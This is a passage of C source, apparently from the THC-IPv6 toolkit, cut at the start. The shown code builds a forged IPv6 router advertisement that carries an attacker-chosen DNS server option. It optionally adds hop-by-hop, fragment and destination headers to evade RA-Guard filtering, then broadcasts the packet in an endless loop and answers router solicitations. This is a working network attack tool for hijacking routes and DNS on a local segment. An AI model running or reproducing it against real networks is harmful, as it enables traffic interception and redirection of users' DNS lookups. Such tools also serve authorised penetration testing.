buf[i++] = 0xfc; // 56-71 address: fc:: i += 15; // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; memcpy(buf + i, dns, 16); // dns server i += 16; frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; // init pcap printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]); while (1) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sleep(5); } return 0; }